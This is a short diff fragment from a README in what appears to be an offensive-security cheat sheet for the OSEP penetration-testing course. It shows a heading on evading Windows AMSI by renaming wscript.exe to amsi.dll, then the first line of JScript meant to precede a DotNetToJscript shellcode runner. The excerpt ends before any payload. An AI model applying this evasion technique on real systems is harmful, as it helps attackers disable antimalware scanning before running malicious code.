peterkhe1999/CheatSheet/OSEP/README.md

 }
 ```

-### Rename wscript.exe to amsi.dll and executing it.
+### Rename wscript.exe to amsi.dll and executing it

 Prepend below code to the DotNetToJscript-generated shellcode runner
 ```js
 var filesys= new ActiveXObject("Scripting.FileSystemObject");